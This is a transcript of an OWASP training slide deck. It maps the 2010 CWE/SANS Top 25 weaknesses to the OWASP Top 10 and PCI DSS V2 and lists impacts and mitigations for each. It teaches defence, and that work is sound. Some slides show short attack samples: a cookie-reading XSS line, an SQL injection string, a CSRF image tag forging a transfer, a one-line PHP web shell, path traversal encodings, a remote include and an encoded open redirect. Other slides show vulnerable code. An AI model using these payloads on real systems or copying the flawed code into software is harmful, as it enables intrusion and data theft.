Presentation is loading. Please wait.

Presentation is loading. Please wait.

The OWASP Foundation OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping Nishi Kumar.

Published byPhillip Davidson Modified over 8 years ago

Similar presentations

Presentation on theme: "The OWASP Foundation OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping Nishi Kumar."— Presentation transcript:

1 The OWASP Foundation http://www.owasp.org OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping Nishi Kumar IT Architect Specialist, FIS OWASP CBT Project Lead OWASP Global Industry Committee Nishi.Kumar@owasp.org Keith Turpin The Boeing Company OWASP Secure Coding Practices Lead OWASP Global Projects Committee keith.turpin@owasp.org

2 2 Objectives Provide an overview of the 2010 CWE/SANS Top 25 Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2 Understand the CWE/SANS Top 25 weaknesses and how to remediate them

3 Organizations MITRE - http://www.mitre.org/http://www.mitre.org/ The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors. CWE Database - http://cwe.mitre.org/http://cwe.mitre.org/ SANS - http://www.sans.orghttp://www.sans.org The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors. 3

4 Selection and Ranking Builds on the original 2009 version Methodology - Qualitative rather than quantitative Factors in ranking - Prevalence and Severity Initially started with 41 candidate weaknesses 4

5 5 2010 CWE/SANS Top 25 RankIDName [1]CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [2]CWE-89Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [3]CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [4]CWE-352Cross-Site Request Forgery (CSRF) [5]CWE-285Improper Authorization [6]CWE-807Reliance on Untrusted Inputs in a Security Decision [7]CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [8]CWE-434Unrestricted Upload of File with Dangerous Type [9]CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') [10]CWE-311Missing Encryption of Sensitive Data [11]CWE-798Use of Hard-coded Credentials [12]CWE-805Buffer Access with Incorrect Length Value

6 6 SANS CWE Top 25 RankIDName [13]CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') [14]CWE-129Improper Validation of Array Index [15]CWE-754Improper Check for Unusual or Exceptional Conditions [16]CWE-209Information Exposure Through an Error Message [17]CWE-190Integer Overflow or Wraparound [18]CWE-131Incorrect Calculation of Buffer Size [19]CWE-306Missing Authentication for Critical Function [20]CWE-494Download of Code Without Integrity Check [21]CWE-732Incorrect Permission Assignment for Critical Resource [22]CWE-770Allocation of Resources Without Limits or Throttling [23]CWE-601URL Redirection to Untrusted Site ('Open Redirect') [24]CWE-327Use of a Broken or Risky Cryptographic Algorithm [25]CWE-362Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

7 7 OWASP Top 10 & SANS CWE Top 25 mapping https://www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project http://www.sans.org/top25-software-errors/ http://cwe.mitre.org/top25/ A1:Injection[2] CWE-89: [9] CWE-78: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') A2:Cross-Site Scripting (XSS) [1] CWE-79:Improper Neutralization of Input During Web Page Generation('Cross-site Scripting') A3:Broken Authentication and Session Management [19] CWE-306: [11] CWE-798: Missing Authentication for Critical Function Use of Hard-coded Credentials A4:Insecure Direct Object References[5] CWE-285: [6] CWE-807: [7] CWE-22: Improper Authorization Reliance on Untrusted Inputs in a Security Decision Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') A5:Cross-Site Request Forgery (CSRF)[4] CWE-352:Cross-Site Request Forgery (CSRF)

8 8 OWASP Top 10 & SANS CWE Top 25 mapping A6:Security Misconfiguration[16] CWE-209:Information Exposure Through an Error Message (Only partially covers OWASP Risk) A7:Insecure Cryptographic Storage [10] CWE-311: [24] CWE-327: Missing Encryption of Sensitive Data Use of a Broken or Risky Cryptographic Algorithm A8:Failure to Restrict URL Access [5] CWE-285: [21] CWE-732: Improper Authorization (Also listed with OWASP A-4) Incorrect Permission Assignment for Critical Resource (CWE-732 covers a broader scope than OWASP A8) A9:Insufficient Transport Layer Protection [10] CWE-311: [24] CWE-327: Missing Encryption of Sensitive Data (Also listed with OWASP A-7) Use of a Broken or Risky Cryptographic Algorithm (Also listed with OWASP A-7) A10:Unvalidated Redirects and Forwards [23] CWE-601:URL Redirection to Untrusted Site ('Open Redirect')

9 9 SANS CWE Top 25 The following do not directly map to the OWASP Top 10 2010 [3] CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [8] CWE-434: Unrestricted Upload of File with Dangerous Type [12] CWE-805: Buffer Access with Incorrect Length Value [13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') [14] CWE-129: Improper Validation of Array Index [15] CWE-754: Improper Check for Unusual or Exceptional Conditions [17] CWE-190: Integer Overflow or Wraparound [18] CWE-131: Incorrect Calculation of Buffer Size [20] CWE-494: Download of Code Without Integrity Check [22] CWE-770: Allocation of Resources Without Limits or Throttling [25] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

10 Mapping Considerations SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses SANS CWE Top 25 target both web and non-web applications OWASP defines ten risks focused on web applications OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities PCI DSS Requirements point to both as industry best practices 10

11 [1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') OWASP 2010: A2 Cross-Site Scripting (XSS) PCI-DSS V2: 6.5.7 Cross-site scripting (XSS) OWASP Top 10 and PCI Mapping The software does not properly neutralize user-controllable input before using it in a web page. Variants include: Reflected: The software reads data directly from the HTTP request and reflects it back in the HTTP response Stored: The software stores data in a database or other trusted data store and includes that data as part of a future web page DOM: Client supplied input is inserted into an HTML response page by a client side script that processed Document Object Model (DOM) data (e.g. document.location, document.URL, etc) General Description 11 Try this in your browser: javascript:alert(document.cookie)

12 [1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Theft of session credentials, networks scans, key stroke loggers, XSS Proxy ( allowing full control and viewing of exploited browser ) Potential Impacts Properly neutralize all input from the client. Be sure to address all content used by the software, that originated in an HTTP Request Conduct all data validation and encoding on a trusted system (e.g., The server) Establish and enforce appropriate data type, range and length controls for all content Use a vetted library or framework to make it easier to generate properly encoded output including Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket Common Mitigations 12 E.g. output encoding becomes > & becomes & and " becomes &quot -> <script> (markup)

13 [2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') OWASP 2010: A1 Injection PCI-DSS V2: 6.5.1 Injection flaws, particularly SQL injection. OWASP Top 10 and PCI Mapping The software constructs a dynamic SQL statement using input that has not been properly neutralized Example of dynamic query modification: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1 This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s http://example.com/app/accountView?id=' or '1'='1 General Description 13

14 Unauthorized access to data, authentication bypass, compromise of the host OS, use of database utilities to breach a perimeter ( when the DB is deployed along network boundaries ) Potential Impacts Use a safe API to avoid using the interpreter entirely or to provide parameterized interface Use strongly typed parameterized queries String sqlString = "select * from db_user where username= ? … PreparedStatement stmt = connection.prepareStatement(sqlString); stmt.setString ( 1, username); … Input validation-Validate and Filter user input to remove special characters ' " ` ; * % _ =&\|*?~<>^()[]{}$\n\r Utilize output encoding Turn off all unnecessary database functionality Common Mitigations 14 [2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

15 Example: C char last_name[20];...................................Declare array with 20 character limit printf ("Enter your last name: "); scanf ("%s", last_name);...........................Get input (no limit) and store in array The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters [3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow OWASP Top 10 and PCI Mapping The software copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer Effects: C, C++ and Assembly General Description 15

16 [3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Allow for the execution of arbitrary code, which is usually outside the scope of a program's implicit security policy Potential Impacts Use a language that does not allow this weakness to occur (e.g., Java) Use a vetted library or framework that help prevent this weakness (e.g., Strsafe.h library from Microsoft) Use a compiler with features or extensions that provide a protection mechanism against buffer overflows Ensure the destination buffer size is equal to or larger than the source buffer size Utilize input validation to enforce length limits Common Mitigations 16

17 Example of a legitimate request: http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 Example or a forged request using a hidden image tag: <img src=http://example.com/app/transferFunds?amount=1500&destinationAccount= attackersAcct# width="0" height="0" /> [4] CWE-352 Cross-Site Request Forgery (CSRF) OWASP 2010: A5 Cross-Site Request Forgery (CSRF) PCI-DSS V2: 6.5.9 Cross-site request forgery (CSRF) OWASP Top 10 and PCI Mapping If the software does not sufficiently verify that the user "intentionally" submitted a request, a user with an active session may be tricked into executing an unintended action on the software. This URL and required parameters must be known to the attacker General Description 17

18 [4] CWE-352 Cross-Site Request Forgery (CSRF) Attackers can cause the victim to execute any action the victim is authorized to perform Potential Impacts Use a vetted library to prevent this weakness (e.g., OWASP CSRFGuard, OWASP ESAPI Session Management control) Include an unpredictable token in each form and verify the token upon receipt of the form Utilize the HTTP POST method to avoid exposing the token in the URL Re-authenticate users prior to performing critical operations Common Mitigations 18

19 [5] CWE-285 Improper Authorization OWASP 2010: A8 Failure to Restrict URL Access A4 Insecure Direct Object References PCI-DSS V2: 6.5.8 Improper Access Control OWASP Top 10 and PCI Mapping The software does not perform or incorrectly performs an authorization check when an attempt is made to access a resource or perform an action Software uses interface or link visibility as an access control. URLs do not have the status of secrets. They are displayed on screen, appear in browser histories and log files, may be shared by users and are known to previously privileged users whose role has changed General Description 19

20 [5] CWE-285 Improper Authorization Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Enforce authorization controls on every request Map roles and use role-based access control (RBAC) to enforce the roles at the appropriate boundaries Enforce application logic flows to comply with business rules Restrict access to files, URLs, protected functions, direct object references, services, application data, user and data attributes and security-relevant configuration information to only authorized users Common Mitigations 20

21 [6] CWE-807 Reliance on Untrusted Inputs in a Security Decision OWASP 2010: A4 Insecure Direct Object References PCI-DSS V2: 6.5.8 Improper Access Control OWASP Top 10 and PCI Mapping The software does not perform or incorrectly performs an authorization check when an attempt is made to access a resource or perform an action The software bases access decisions on client accessible state data. (e.g., https://example.com/accountInfo?acct=not-my-acct) State information can be stored in various locations such as a cookie, a parameter, an environment variable, a client side database record or within a settings file. All of these locations have the potential to be modified by an attacker In web applications, state data may be any item in the HTTP request that is used in addition to the session identifier to make access decisions General Description 21

22 [6] CWE-807 Reliance on Untrusted Inputs in a Security Decision Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Enforce authorization controls on every request Store state information and sensitive data only on a trusted system (e.g. the server) If state data must be stored on the client, use encryption and integrity checking on the server side to prevent state tampering. (e.g., ASP.NET View State) Enforce application logic flows to comply with business rules Common Mitigations 22

23 [7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') OWASP 2010: A4 Insecure Direct Object References PCI-DSS V2: 6.5.8 Improper Access Control OWASP Top 10 and PCI Mapping The software constructs dynamic directory or file path statements based on user supplied input that is not properly neutralized for special elements that can alter the path The “dot-dot-slash (../ or..\)” sequences can be used to move up the directory structure and then navigate to a new location Where international characters are supported, extended UTF-8 encoding may also work and may bypass validation checking (e.g., %c0%ae%c0%ae/%c0%ae%c0%ae/ =../../) Injecting a null byte may allow an attacker to truncate a generated filename to widen the scope of attack.(e.g. the software may add ".txt" to any pathname, but submitting File%00 may bypass this restriction General Description 23

24 [7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Unauthorized access to read, create or overwrite critical files Potential Impacts Properly neutralize all input from the client especially path characters (., /, \) and null bytes (%00) Conduct all data validation and encoding on a trusted system (e.g., The server) Reduce input encodings and representations of data to a single simple form before validating Use parameterized place holders that map to the target, instead of actual file names or paths (e.g., client only sees id=1, on the server id 1 maps to file.txt ) Common Mitigations 24

25 [8] CWE-434 Unrestricted Upload of File with Dangerous Type OWASP 2010: N/A PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping The software allows the for the uploading or transfer files of dangerous types that can be automatically processed within the product's environment In a web application the intent may be to allow users to upload image files. However if proper validation of the file type is not done the user may upload something else like malicious.php and then access that file to gain unauthorized privileges. The malicious.php file could do anything including providing access to the host OS: General Description 25 Example: PHP <?php system($_GET['cmd']); ?>

26 [8] CWE-434 Unrestricted Upload of File with Dangerous Type Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts The software should generate its own filename for an uploaded file instead of the user-supplied filename Validate uploaded files are the expected type by checking file headers Prevent or restrict the uploading of any file that may be interpreted by the web server Turn off execution privileges on file upload directories Do not save files in the same web context as the application Common Mitigations 26

27 [9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') OWASP 2010: A1 Injection PCI-DSS V2: 6.5.1 Injection flaws OWASP Top 10 and PCI Mapping The software constructs all or part of an OS command using input that has not been properly neutralized Variants include: The software intends to execute a single, fixed program that is under its own control using externally-supplied inputs as arguments to that program. However, if the program does not remove command separators from input, separators in the argument for the execution of additional programs The software accepts an input that it uses to fully select which program to run, as well as which commands to use. The application redirects this entire command to the operating system General Description 27

28 Execution of arbitrary code, authentication bypass, compromise of the host OS Potential Impacts Utilize task specific built-in APIs to conduct operating system tasks Run code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system Properly neutralize all input from the client, especially command separators and special characters which can effect intended execution Conduct all data validation and encoding on a trusted system (e.g., The server) Common Mitigations 28 [9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

29 [10] CWE-311 Missing Encryption of Sensitive Data OWASP 2010: A7 Insecure Cryptographic Storage A9: Insufficient Transport Layer Protection PCI-DSS V2: 6.5.3 Insecure cryptographic storage 6.5.4 Insecure communications Additionally: 2.3, 3.4, 3.5, 3.6, 4.1, 4.2, 8.4 OWASP Top 10 and PCI Mapping The software does not encrypt sensitive or critical information before storage or transmission Unencrypted network traffic may be intercepted, monitored or in some cases altered Sensitive information stored in plain text may be accessed without authorization if the data store is reached General Description 29

30 [10] CWE-311 Missing Encryption of Sensitive Data Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Implement encryption for the transmission of all sensitive information and for conducting critical operations (e.g., TLS, SSH and SFTP) Prevent unauthorized access by encrypting sensitive data, even on trusted systems Select a well-vetted algorithm that is currently considered to be strong (e.g., FIPS 140-2 or an equivalent standard). Periodically ensure that the cryptography used by the software has not become obsolete If the software relies on wireless communications, implement strong encryption for authentication and transmission Common Mitigations 30

31 [11] CWE-798 Use of Hard-coded Credentials OWASP 2010: A3 Broken Authentication and Session Management PCI-DSS V2: 8.5 Ensure proper user identification and authentication management OWASP Top 10 and PCI Mapping The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data Variants include: Inbound: The software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials Outbound: The software connects to another system or component, and it contains hard-coded credentials for connecting to that component General Description 31

32 [11] CWE-798 Use of Hard-coded Credentials Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Outbound Authentication: Store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system Inbound Authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key If the software must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials Common Mitigations 32

33 [12] CWE-805 Buffer Access with Incorrect Length Value OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow OWASP Top 10 and PCI Mapping The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer When the length value exceeds the size of the destination, a buffer overflow could occur Effects: C, C++ and Assembly General Description 33

34 [12] CWE-805 Buffer Access with Incorrect Length Value Allow for the execution of arbitrary code, which is usually outside the scope of a program's implicit security policy Potential Impacts Use a language that does not allow this weakness to occur (e.g., Java) Use a vetted library or framework that help prevent this weakness (e.g., Strsafe.h library from Microsoft) Use a compiler with features or extensions that provide a protection mechanism against buffer overflows Ensure the destination buffer size is equal to or larger than the source buffer size Utilize input validation to enforce length limits Common Mitigations 34

35 [13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') OWASP 2010: N/A PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions The following code attempts to include a function contained in a separate PHP page by building a path to the file using the supplied 'module_name' parameter and appending the string '/function.php' to it. The value of $dir is not restricted and could be manipulated by submitting an unanticipated parameter for 'module_name' General Description 35 Example: PHP $dir = $_GET['module_name']; include($dir. "/function.php"); Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com

36 [13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') Execution of arbitrary code, Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Properly neutralize all input from the client especially path characters (., /, \) and null bytes (%00) Conduct all data validation and encoding on a trusted system (e.g., The server) Use parameterized place holders that map to the target, instead of actual file names or paths (e.g., client only sees id=1, on the server id 1 maps to file.txt ) Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system Set allow_url_fopen to false, which limits the ability to include files from remote locations Common Mitigations 36

37 [14] CWE-129 Improper Validation of Array Index OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow OWASP Top 10 and PCI Mapping The software uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array When the length value exceeds the size of the destination, a buffer overflow could occur General Description 37 Example: Java public String getValue(int index) { return array[index]; } If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised

38 [14] CWE-129 Improper Validation of Array Index System crash Allow for the execution of arbitrary code Unauthorized access to read or modify data Potential Impacts Use program level exception handlers if they are available (e.g., Java, Ruby) Utilize input validation to enforce length and range limits Conduct all data validation and encoding on a trusted system (e.g., The server) Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system Common Mitigations 38

39 [15] CWE-754 Improper Check for Unusual or Exceptional Condition OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow 6.5.5 Improper error handling OWASP Top 10 and PCI Mapping The software does not check or improperly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software General Description 39 Example: Java (Bad Code)Example Language: Java String itemName = request.getParameter(ITEM_NAME); if (itemName.compareTo(IMPORTANT_ITEM) == 0) {... } The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.

40 [15] CWE-754 Improper Check for Unusual or Exceptional Condition System crash Allow for the execution of arbitrary code Unauthorized access to read or modify data Potential Impacts Use program level exception handlers if they are available (e.g., Java, Ruby) Check the results of all functions that return a value and verify that the value is expected Ensure that error messages only contain minimal details that are useful to the intended audience If the program must fail, ensure it fails securely Ensure the software can handle low resource conditions Common Mitigations 40

41 [16] CWE-209 Information Exposure Through an Error Message OWASP 2010: A6: Security Misconfiguration PCI-DSS V2: 6.5.5 Improper error handling OWASP Top 10 and PCI Mapping The software generates an error message that includes sensitive information about its environment, users, or associated data General Description 41 Example: Java try { /.../ } catch (Exception e) { System.out.println(e); } If this output is redirected to a web user, this may represent a security problem In the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.

42 [16] CWE-209 Information Exposure Through an Error Message Unauthorized access to sensitive information, including details about the software or its components Potential Impacts Use program level exception handlers if they are available (e.g., Java, Ruby) Ensure that error messages only contain minimal details that are useful to the intended audience. Error messages to users should not display system details, session identifiers, account information, debugging or stack trace information In web applications implement generic error messages and use custom error pages Common Mitigations 42

43 [17] CWE-190 Integer Overflow or Wraparound OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow OWASP Top 10 and PCI Mapping The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value General Description 43 Example: C nresp = packet_get_int(); if (nresp > 0) { response = xmalloc(nresp*sizeof(char*)); for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL); } If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response

44 [17] CWE-190 Integer Overflow or Wraparound System crash Allow for the execution of arbitrary code Data Corruption Potential Impacts Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol Use libraries or frameworks that make it easier to handle numbers without unexpected consequences. (e.g., SafeInt (C++) or IntegerLib (C or C++) Utilize input validation to enforce length and range limits Conduct all data validation and encoding on a trusted system (e.g., The server) Common Mitigations 44

45 [18] CWE-131 Incorrect Calculation of Buffer Size OWASP 2010: N/A PCI-DSS V2: 6.5.2 Buffer overflow OWASP Top 10 and PCI Mapping The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow General Description 45 Example: C int *id_sequence; id_sequence = (int*) malloc(3); if (id_sequence == NULL) exit(1); id_sequence[0] = 13579; id_sequence[1] = 24680; id_sequence[2] = 97531; The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space

46 [18] CWE-131 Incorrect Calculation of Buffer Size System crash Allow for the execution of arbitrary code Unauthorized access to read or modify data Potential Impacts If you allocate a buffer for the purpose of transforming, converting, or encoding an input, make sure that you allocate enough memory to handle the largest possible encoding Understand your programming language's underlying representation and how it interacts with numeric calculation Utilize input validation to enforce length and range limits Conduct all data validation and encoding on a trusted system (e.g., The server) Common Mitigations 46

47 [19] CWE-306 Missing Authentication for Critical Function OWASP 2010: A3 Broken Authentication and Session Management PCI-DSS V2: 8.5 Ensure proper user identification and authentication management OWASP Top 10 and PCI Mapping The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources General Description 47

48 [19] CWE-306 Missing Authentication for Critical Function Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Utilize authentication for all information, resources and functionality, except those specifically intended to be public Ensure all authentication controls operate on a trusted system Use a standardized, centralized, and tested implementation for all authentication controls Authentication services should utilize a centralized authentication store All authentication controls need to fail securely Map roles and use role-based access control (RBAC) to enforce the roles at the appropriate boundaries Common Mitigations 48

49 [20] CWE-494 Download of Code Without Integrity Check OWASP 2010: N/A PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code General Description 49 Example: Java URL[] classURLs= new URL[]{ new URL("file:subdir/") }; URLClassLoader loader = new URLClassLoader(classURLs); Class loadedClass = Class.forName("loadMe", true, loader); This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.

50 [20] CWE-494 Download of Code Without Integrity Check Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software or hosting environment's security controls Potential Impacts Perform proper forward and reverse DNS lookups to detect DNS spoofing Encrypt the code with a reliable encryption scheme before transmitting Perform integrity checking on the transmitted code Use code signing technologies such as Authenticode Common Mitigations 50

51 [21] CWE-732 Incorrect Permission Assignment for Critical Resource OWASP 2010: A8 Failure to Restrict URL Access PCI-DSS V2: 6.5.8 Improper Access Control OWASP Top 10 and PCI Mapping The software specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors Assumptions might be made about the environment in which the software runs, but changes to the environment, data sensitivity or user groups might result in inappropriate permissions Permissions may be set loose in order to minimize problems installation and configuration. The software may require the administrator to proactively lock it down before moving to production, which does not always happen General Description 51

52 [21] CWE-732 Incorrect Permission Assignment for Critical Resource Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts When using a critical resource verify that it has secure permissions During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software's administrator Do not assume that the system administrator will manually change the configuration to the settings that you recommend in the manual Map roles and use role-based access control (RBAC) to enforce the roles at the appropriate boundaries Common Mitigations 52

53 [22] CWE-770 Allocation of Resources Without Limits or Throttling OWASP 2010: N/A PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on how many resources can be allocated, in violation of the intended security policy for that actor General Description 53 Example: C and C++ sock=socket(AF_INET, SOCK_STREAM, 0); while (1) { newsock=accept(sock,...); printf("A connection has been accepted\n"); pid = fork(); } This code allocates a socket and forks each time it receives a new connection. The program does not track how many connections have been made, and it does not limit the number of connections. A large number of connections could cause the system to run out of resources

54 [22] CWE-770 Allocation of Resources Without Limits or Throttling Denial of service Potential Impacts Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410 Design throttling mechanisms into the system architecture Ensure that protocols have specific limits of scale placed on them If the program must fail, ensure that it fails securely Common Mitigations 54

55 [23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect') OWASP 2010: A10 Unvalidated Redirects and Forwards PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect General Description 55 Example: PHP $redirect_url = $_GET['url']; header("Location: ". $redirect_url); This page could be used as part of a phishing scam by initialing on a trusted domain, but redirecting users to a malicious site. An attacker could supply a user with the following link: http://example.com/example.php?url=http://malicious.example.com This is the same URL only obfuscated with URL encoding to mask the off site redirect: http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%6 9%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d

56 [23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect') Compromise of the client machine through malware exposure Client credential or sensitive information exposure through spoofing content that implies the user is still on the trusted web site Potential Impacts When the set of acceptable URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs Do not pass user supplied data into a dynamic redirect. If this must be allowed, then the redirect should accept only validated, relative path URLs If absolute paths are used, either have the page add the domain component or strictly validate the domain Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site Common Mitigations 56

57 [24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm OWASP 2010: A7: Insecure Cryptographic Storage A9: Insufficient Transport Layer Protection PCI-DSS V2: 4.1 Use strong cryptography and security protocols 6.5.3 Insecure cryptographic storage OWASP Top 10 and PCI Mapping The software uses a broken or risky cryptographic algorithm. The algorithm may be dangerous because it is non-standard or because it is known to be weak The Data Encryption Standard (DES) was once considered a strong algorithm, however it is now regarded as insufficient for many applications and has been replaced by Advanced Encryption Standard (AES) General Description 57

58 [24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm Unauthorized access to read or modify data Ability to gain additional privileges that could lead to a complete compromise of the software's security controls Potential Impacts Select a well-vetted algorithm that is currently considered to be strong (e.g., FIPS 140-2 (i.e. Triple-DES, AES, RSA) or an equivalent standard) Periodically ensure that the cryptography used by the software has not become obsolete Design your software so that you can replace one cryptographic algorithm with another All cryptographic functions used to protect secrets from the application user must be implemented on a trusted system (e.g., The server) Protect master secrets from unauthorized access Common Mitigations 58

59 [25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') OWASP 2010: N/A PCI-DSS V2: N/A OWASP Top 10 and PCI Mapping The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider General Description 59

60 [25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Unauthorized access to read data Denial of service Potential Impacts In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring When using multithreading and operating on shared variables, only use thread-safe functions Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization Common Mitigations 60

61 61

Download ppt "The OWASP Foundation OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping Nishi Kumar."

Similar presentations

Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
SEC835 OWASP Top Ten Project.

